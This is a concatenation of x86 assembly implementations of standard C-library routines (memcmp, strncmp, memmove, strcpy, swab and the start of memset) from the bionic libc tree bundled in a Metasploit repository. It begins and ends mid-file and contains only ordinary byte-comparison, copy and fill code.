pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 11(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_12):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_12_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $12, (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $12, %xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 12(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_12_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $12, (%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $12, 16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_12_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $12,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $12,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_12_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_12_gobble_next)
inc %edx
add $32, %ecx
L(shr_12_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 12(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_13):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_13_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $13, (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $13, %xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 13(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_13_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $13, (%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $13, 16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_13_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $13,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $13,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_13_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_13_gobble_next)
inc %edx
add $32, %ecx
L(shr_13_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 13(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_14):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_14_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $14, (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $14, %xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 14(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_14_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $14, (%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $14, 16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_14_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $14,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $14,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_14_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_14_gobble_next)
inc %edx
add $32, %ecx
L(shr_14_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 14(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_15):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_15_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $15, (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $15, %xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 15(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_15_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $15, (%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $15, 16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_15_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $15,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $15,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_15_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_15_gobble_next)
inc %edx
add $32, %ecx
L(shr_15_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 15(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(exit):
pmovmskb %xmm1, %ebx
sub $0xffff, %ebx
jz L(first16bytes)
lea -16(%esi), %esi
lea -16(%edi), %edi
mov %ebx, %edx
L(first16bytes):
add %eax, %esi
L(less16bytes):
test %dl, %dl
jz L(next_24_bytes)
test $0x01, %dl
jnz L(Byte16)
test $0x02, %dl
jnz L(Byte17)
test $0x04, %dl
jnz L(Byte18)
test $0x08, %dl
jnz L(Byte19)
test $0x10, %dl
jnz L(Byte20)
test $0x20, %dl
jnz L(Byte21)
test $0x40, %dl
jnz L(Byte22)
L(Byte23):
movzbl -9(%edi), %eax
movzbl -9(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte16):
movzbl -16(%edi), %eax
movzbl -16(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte17):
movzbl -15(%edi), %eax
movzbl -15(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte18):
movzbl -14(%edi), %eax
movzbl -14(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte19):
movzbl -13(%edi), %eax
movzbl -13(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte20):
movzbl -12(%edi), %eax
movzbl -12(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte21):
movzbl -11(%edi), %eax
movzbl -11(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte22):
movzbl -10(%edi), %eax
movzbl -10(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(next_24_bytes):
lea 8(%edi), %edi
lea 8(%esi), %esi
test $0x01, %dh
jnz L(Byte16)
test $0x02, %dh
jnz L(Byte17)
test $0x04, %dh
jnz L(Byte18)
test $0x08, %dh
jnz L(Byte19)
test $0x10, %dh
jnz L(Byte20)
test $0x20, %dh
jnz L(Byte21)
test $0x40, %dh
jnz L(Byte22)
ALIGN (4)
L(Byte31):
movzbl -9(%edi), %eax
movzbl -9(%esi), %edx
sub %edx, %eax
RETURN_END
CFI_PUSH (%ebx)
ALIGN (4)
L(more8bytes):
cmp $16, %ecx
jae L(more16bytes)
cmp $8, %ecx
je L(8bytes)
cmp $9, %ecx
je L(9bytes)
cmp $10, %ecx
je L(10bytes)
cmp $11, %ecx
je L(11bytes)
cmp $12, %ecx
je L(12bytes)
cmp $13, %ecx
je L(13bytes)
cmp $14, %ecx
je L(14bytes)
jmp L(15bytes)
ALIGN (4)
L(more16bytes):
cmp $24, %ecx
jae L(more24bytes)
cmp $16, %ecx
je L(16bytes)
cmp $17, %ecx
je L(17bytes)
cmp $18, %ecx
je L(18bytes)
cmp $19, %ecx
je L(19bytes)
cmp $20, %ecx
je L(20bytes)
cmp $21, %ecx
je L(21bytes)
cmp $22, %ecx
je L(22bytes)
jmp L(23bytes)
ALIGN (4)
L(more24bytes):
cmp $32, %ecx
jae L(more32bytes)
cmp $24, %ecx
je L(24bytes)
cmp $25, %ecx
je L(25bytes)
cmp $26, %ecx
je L(26bytes)
cmp $27, %ecx
je L(27bytes)
cmp $28, %ecx
je L(28bytes)
cmp $29, %ecx
je L(29bytes)
cmp $30, %ecx
je L(30bytes)
jmp L(31bytes)
ALIGN (4)
L(more32bytes):
cmp $40, %ecx
jae L(more40bytes)
cmp $32, %ecx
je L(32bytes)
cmp $33, %ecx
je L(33bytes)
cmp $34, %ecx
je L(34bytes)
cmp $35, %ecx
je L(35bytes)
cmp $36, %ecx
je L(36bytes)
cmp $37, %ecx
je L(37bytes)
cmp $38, %ecx
je L(38bytes)
jmp L(39bytes)
ALIGN (4)
L(more40bytes):
cmp $40, %ecx
je L(40bytes)
cmp $41, %ecx
je L(41bytes)
cmp $42, %ecx
je L(42bytes)
cmp $43, %ecx
je L(43bytes)
cmp $44, %ecx
je L(44bytes)
cmp $45, %ecx
je L(45bytes)
cmp $46, %ecx
je L(46bytes)
jmp L(47bytes)
ALIGN (4)
L(less48bytes):
cmp $8, %ecx
jae L(more8bytes)
cmp $2, %ecx
je L(2bytes)
cmp $3, %ecx
je L(3bytes)
cmp $4, %ecx
je L(4bytes)
cmp $5, %ecx
je L(5bytes)
cmp $6, %ecx
je L(6bytes)
jmp L(7bytes)
ALIGN (4)
L(44bytes):
mov -44(%eax), %ecx
mov -44(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(40bytes):
mov -40(%eax), %ecx
mov -40(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(36bytes):
mov -36(%eax), %ecx
mov -36(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(32bytes):
mov -32(%eax), %ecx
mov -32(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(28bytes):
mov -28(%eax), %ecx
mov -28(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(24bytes):
mov -24(%eax), %ecx
mov -24(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(20bytes):
mov -20(%eax), %ecx
mov -20(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(16bytes):
mov -16(%eax), %ecx
mov -16(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(12bytes):
mov -12(%eax), %ecx
mov -12(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(8bytes):
mov -8(%eax), %ecx
mov -8(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(4bytes):
mov -4(%eax), %ecx
mov -4(%edx), %ebx
cmp %ebx, %ecx
mov $0, %eax
jne L(find_diff)
POP (%ebx)
ret
CFI_PUSH (%ebx)
ALIGN (4)
L(45bytes):
mov -45(%eax), %ecx
mov -45(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(41bytes):
mov -41(%eax), %ecx
mov -41(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(37bytes):
mov -37(%eax), %ecx
mov -37(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(33bytes):
mov -33(%eax), %ecx
mov -33(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(29bytes):
mov -29(%eax), %ecx
mov -29(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(25bytes):
mov -25(%eax), %ecx
mov -25(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(21bytes):
mov -21(%eax), %ecx
mov -21(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(17bytes):
mov -17(%eax), %ecx
mov -17(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(13bytes):
mov -13(%eax), %ecx
mov -13(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(9bytes):
mov -9(%eax), %ecx
mov -9(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(5bytes):
mov -5(%eax), %ecx
mov -5(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
movzbl -1(%eax), %ecx
cmp -1(%edx), %cl
mov $0, %eax
jne L(end)
POP (%ebx)
ret
CFI_PUSH (%ebx)
ALIGN (4)
L(46bytes):
mov -46(%eax), %ecx
mov -46(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(42bytes):
mov -42(%eax), %ecx
mov -42(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(38bytes):
mov -38(%eax), %ecx
mov -38(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(34bytes):
mov -34(%eax), %ecx
mov -34(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(30bytes):
mov -30(%eax), %ecx
mov -30(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(26bytes):
mov -26(%eax), %ecx
mov -26(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(22bytes):
mov -22(%eax), %ecx
mov -22(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(18bytes):
mov -18(%eax), %ecx
mov -18(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(14bytes):
mov -14(%eax), %ecx
mov -14(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(10bytes):
mov -10(%eax), %ecx
mov -10(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(6bytes):
mov -6(%eax), %ecx
mov -6(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(2bytes):
movzwl -2(%eax), %ecx
movzwl -2(%edx), %ebx
cmp %bl, %cl
jne L(end)
cmp %bh, %ch
mov $0, %eax
jne L(end)
POP (%ebx)
ret
CFI_PUSH (%ebx)
ALIGN (4)
L(47bytes):
movl -47(%eax), %ecx
movl -47(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(43bytes):
movl -43(%eax), %ecx
movl -43(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(39bytes):
movl -39(%eax), %ecx
movl -39(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(35bytes):
movl -35(%eax), %ecx
movl -35(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(31bytes):
movl -31(%eax), %ecx
movl -31(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(27bytes):
movl -27(%eax), %ecx
movl -27(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(23bytes):
movl -23(%eax), %ecx
movl -23(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(19bytes):
movl -19(%eax), %ecx
movl -19(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(15bytes):
movl -15(%eax), %ecx
movl -15(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(11bytes):
movl -11(%eax), %ecx
movl -11(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(7bytes):
movl -7(%eax), %ecx
movl -7(%edx), %ebx
cmp %ebx, %ecx
jne L(find_diff)
L(3bytes):
movzwl -3(%eax), %ecx
movzwl -3(%edx), %ebx
cmpb %bl, %cl
jne L(end)
cmp %bx, %cx
jne L(end)
movzbl -1(%eax), %eax
cmpb -1(%edx), %al
mov $0, %eax
jne L(end)
POP (%ebx)
ret
CFI_PUSH (%ebx)
ALIGN (4)
L(find_diff):
cmpb %bl, %cl
jne L(end)
cmp %bx, %cx
jne L(end)
shr $16,%ecx
shr $16,%ebx
cmp %bl, %cl
jne L(end)
cmp %bx, %cx
L(end):
POP (%ebx)
mov $1, %eax
ja L(bigger)
neg %eax
L(bigger):
ret
END (MEMCMP)
|
OpenWireSec/metasploit | 1,510 | external/source/meterpreter/source/bionic/libc/arch-x86/string/strncmp.S | /* $OpenBSD: strncmp.S,v 1.3 2005/08/07 11:30:38 espie Exp $ */
/*
* Written by J.T. Conklin <jtc@netbsd.org>.
* Public domain.
*/
#include <machine/asm.h>
/*
* NOTE: I've unrolled the loop eight times: large enough to make a
* significant difference, and small enough not to totally trash the
* cache.
*/
/*
 * int strncmp(const char *s1, const char *s2, size_t n)
 *
 * IA-32, cdecl.  Stack arguments (offsets are as seen AFTER the
 * push of %ebx below):
 *   8(%esp)  = s1  -> kept in %eax
 *   12(%esp) = s2  -> kept in %ecx
 *   16(%esp) = n   -> kept in %edx and counted down to zero
 * Returns in %eax: 0 if the strings are equal within the first n
 * bytes, otherwise the difference of the first mismatching bytes,
 * compared as unsigned chars.
 * %ebx is callee-saved, which is why it is pushed before being used
 * as the per-byte scratch register (%bl).
 *
 * The loop compares eight bytes per pass (see the unrolling note in
 * the file header); every compare exits to L3 on mismatch or NUL,
 * and every count decrement exits to L4 when n is exhausted.
 */
ENTRY(strncmp)
	pushl	%ebx			/* save callee-saved scratch register */
	movl	8(%esp),%eax		/* eax = s1 */
	movl	12(%esp),%ecx		/* ecx = s2 */
	movl	16(%esp),%edx		/* edx = remaining count n */
	testl	%edx,%edx		/* prime ZF for the n == 0 case */
	jmp	L2			/* Jump into the loop! */
	.align 2,0x90
L1:	incl	%eax			/* advance both pointers */
	incl	%ecx
	decl	%edx			/* sets ZF when the count hits zero */
L2:	jz	L4			/* strings are equal */
	movb	(%eax),%bl		/* unrolled compare 1: bl = *s1 */
	testb	%bl,%bl			/* NUL in s1: let L3 form the result */
	jz	L3
	cmpb	%bl,(%ecx)		/* mismatch: form the result at L3 */
	jne	L3
	incl	%eax
	incl	%ecx
	decl	%edx
	jz	L4
	movb	(%eax),%bl		/* unrolled compare 2 */
	testb	%bl,%bl
	jz	L3
	cmpb	%bl,(%ecx)
	jne	L3
	incl	%eax
	incl	%ecx
	decl	%edx
	jz	L4
	movb	(%eax),%bl		/* unrolled compare 3 */
	testb	%bl,%bl
	jz	L3
	cmpb	%bl,(%ecx)
	jne	L3
	incl	%eax
	incl	%ecx
	decl	%edx
	jz	L4
	movb	(%eax),%bl		/* unrolled compare 4 */
	testb	%bl,%bl
	jz	L3
	cmpb	%bl,(%ecx)
	jne	L3
	incl	%eax
	incl	%ecx
	decl	%edx
	jz	L4
	movb	(%eax),%bl		/* unrolled compare 5 */
	testb	%bl,%bl
	jz	L3
	cmpb	%bl,(%ecx)
	jne	L3
	incl	%eax
	incl	%ecx
	decl	%edx
	jz	L4
	movb	(%eax),%bl		/* unrolled compare 6 */
	testb	%bl,%bl
	jz	L3
	cmpb	%bl,(%ecx)
	jne	L3
	incl	%eax
	incl	%ecx
	decl	%edx
	jz	L4
	movb	(%eax),%bl		/* unrolled compare 7 */
	testb	%bl,%bl
	jz	L3
	cmpb	%bl,(%ecx)
	jne	L3
	incl	%eax
	incl	%ecx
	decl	%edx
	jz	L4
	movb	(%eax),%bl		/* unrolled compare 8: loop on a match */
	testb	%bl,%bl
	jz	L3
	cmpb	%bl,(%ecx)
	je	L1
	.align 2,0x90
L3:	movzbl	(%eax),%eax	/* unsigned comparison of the final bytes */
	movzbl	(%ecx),%ecx
	subl	%ecx,%eax		/* return (u8)*s1 - (u8)*s2 */
	popl	%ebx
	ret
	.align 2,0x90
L4:	xorl	%eax,%eax		/* equal within n bytes: return 0 */
	popl	%ebx
	ret
|
OpenWireSec/metasploit | 1,711 | external/source/meterpreter/source/bionic/libc/arch-x86/string/memmove_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
 * Build-time dispatch for memmove: when SSSE3 is enabled, reuse the
 * SSSE3 memcpy implementation with MEMCPY renamed to memmove and
 * USE_AS_MEMMOVE set so it handles overlapping buffers; otherwise
 * fall back to the generic memmove.S.
 */
#if defined(USE_SSSE3)
# include "cache_wrapper.S"
# undef __i686			/* avoid clash with the PC-thunk symbol name */
# define MEMCPY memmove
# define USE_AS_MEMMOVE
# include "ssse3-memcpy5.S"
#else
# include "memmove.S"
#endif
|
OpenWireSec/metasploit | 1,179 | external/source/meterpreter/source/bionic/libc/arch-x86/string/strcpy.S | /* $OpenBSD: strcpy.S,v 1.8 2005/08/07 11:30:38 espie Exp $ */
/*
* Written by J.T. Conklin <jtc@netbsd.org>.
* Public domain.
*/
#include <machine/asm.h>
#if defined(APIWARN)
#APP
.section .gnu.warning.strcpy
.ascii "warning: strcpy() is almost always misused, please use strlcpy()"
#NO_APP
#endif
/*
* NOTE: I've unrolled the loop eight times: large enough to make a
* significant difference, and small enough not to totally trash the
* cache.
*/
/*
 * char *strcpy(char *dst, const char *src)
 *
 * IA-32, cdecl.  Arguments:
 *   4(%esp) = dst -> kept in %ecx
 *   8(%esp) = src -> kept in %edx
 * Returns dst in %eax (saved on the stack across the copy loop).
 * Clobbers %al, %ecx, %edx, flags; no callee-saved registers used.
 *
 * Copies eight bytes per loop pass; each byte is stored before it is
 * tested, so the terminating NUL is always written.
 */
ENTRY(strcpy)
	movl	4(%esp),%ecx		/* dst address */
	movl	8(%esp),%edx		/* src address */
	pushl	%ecx			/* push dst address */
	.align 2,0x90
L1:	movb	(%edx),%al		/* unroll loop, but not too much */
	movb	%al,(%ecx)
	testb	%al,%al			/* copied the NUL? then done */
	jz	L2
	movb	1(%edx),%al
	movb	%al,1(%ecx)
	testb	%al,%al
	jz	L2
	movb	2(%edx),%al
	movb	%al,2(%ecx)
	testb	%al,%al
	jz	L2
	movb	3(%edx),%al
	movb	%al,3(%ecx)
	testb	%al,%al
	jz	L2
	movb	4(%edx),%al
	movb	%al,4(%ecx)
	testb	%al,%al
	jz	L2
	movb	5(%edx),%al
	movb	%al,5(%ecx)
	testb	%al,%al
	jz	L2
	movb	6(%edx),%al
	movb	%al,6(%ecx)
	testb	%al,%al
	jz	L2
	movb	7(%edx),%al
	movb	%al,7(%ecx)
	addl	$8,%edx			/* advance both pointers one block */
	addl	$8,%ecx
	testb	%al,%al			/* byte 7 was stored before the test too */
	jnz	L1
L2:	popl	%eax			/* pop dst address (the return value) */
	ret
|
OpenWireSec/metasploit | 1,068 | external/source/meterpreter/source/bionic/libc/arch-x86/string/swab.S | /* $OpenBSD: swab.S,v 1.3 2005/08/07 11:30:38 espie Exp $ */
/*
* Written by J.T. Conklin <jtc@netbsd.org>.
* Public domain.
*/
#include <machine/asm.h>
/*
* On the i486, this code is negligibly faster than the code generated
* by gcc at about half the size. If my i386 databook is correct, it
* should be considerably faster than the gcc code on a i386.
*/
/*
 * void swab(const void *src, void *dst, ssize_t len)
 *
 * IA-32, cdecl.  Arguments (offsets after the two pushes below):
 *   12(%esp) = src -> %esi
 *   16(%esp) = dst -> %edi
 *   20(%esp) = len in bytes -> %ecx (converted to a word count)
 * Copies len/2 16-bit words from src to dst, swapping the two bytes
 * of each word (lodsw/rorw $8/stosw).  %esi/%edi are callee-saved
 * and restored on exit; %eax/%ecx/flags are clobbered.
 */
ENTRY(swab)
	pushl	%esi
	pushl	%edi
	movl	12(%esp),%esi
	movl	16(%esp),%edi
	movl	20(%esp),%ecx
	cld				# set direction forward
	shrl	$1,%ecx			# bytes -> 16-bit word count
	testl	$7,%ecx			# copy first group of 1 to 7 words
	jz	L2			# while swapping alternate bytes.
	.align 2,0x90
L1:	lodsw				# ax = next word from src
	rorw	$8,%ax			# exchange the two bytes
	stosw				# store to dst
	decl	%ecx
	testl	$7,%ecx			# stop once the count is a multiple of 8
	jnz	L1
L2:	shrl	$3,%ecx			# copy remainder 8 words at a time
	jz	L4			# while swapping alternate bytes.
	.align 2,0x90
L3:	lodsw
	rorw	$8,%ax
	stosw
	lodsw
	rorw	$8,%ax
	stosw
	lodsw
	rorw	$8,%ax
	stosw
	lodsw
	rorw	$8,%ax
	stosw
	lodsw
	rorw	$8,%ax
	stosw
	lodsw
	rorw	$8,%ax
	stosw
	lodsw
	rorw	$8,%ax
	stosw
	lodsw
	rorw	$8,%ax
	stosw
	decl	%ecx			# one 8-word block done
	jnz	L3
L4:	popl	%edi
	popl	%esi
	ret
|
OpenWireSec/metasploit | 1,033 | external/source/meterpreter/source/bionic/libc/arch-x86/string/memset.S | /* $OpenBSD: memset.S,v 1.3 2005/08/07 11:30:38 espie Exp $ */
/*
* Written by J.T. Conklin <jtc@netbsd.org>.
* Public domain.
*/
#include <machine/asm.h>
/*
 * void *memset(void *dst, int c, size_t n)
 *
 * IA-32, cdecl.  Arguments (offsets after the two pushes below):
 *   12(%esp) = dst -> %edi
 *   16(%esp) = c   -> %eax (low byte, then replicated to all 4 bytes)
 *   20(%esp) = n   -> %ecx
 * Returns dst in %eax (saved on the stack across the fill).
 * %edi/%ebx are callee-saved and restored on exit.
 *
 * Strategy: byte-fill up to a 4-byte boundary, dword-fill the bulk
 * with rep stosl, then byte-fill the tail; buffers of 15 bytes or
 * fewer are filled byte-wise without the alignment work.
 */
ENTRY(memset)
	pushl	%edi
	pushl	%ebx
	movl	12(%esp),%edi
	movzbl	16(%esp),%eax	/* unsigned char, zero extend */
	movl	20(%esp),%ecx
	pushl	%edi		/* push address of buffer */
	cld			/* set fill direction forward */
	/*
	 * if the string is too short, it's really not worth the overhead
	 * of aligning to word boundries, etc. So we jump to a plain
	 * unaligned set.
	 */
	cmpl	$0x0f,%ecx
	jle	L1
	movb	%al,%ah		/* copy char to all bytes in word */
	movl	%eax,%edx
	sall	$16,%eax
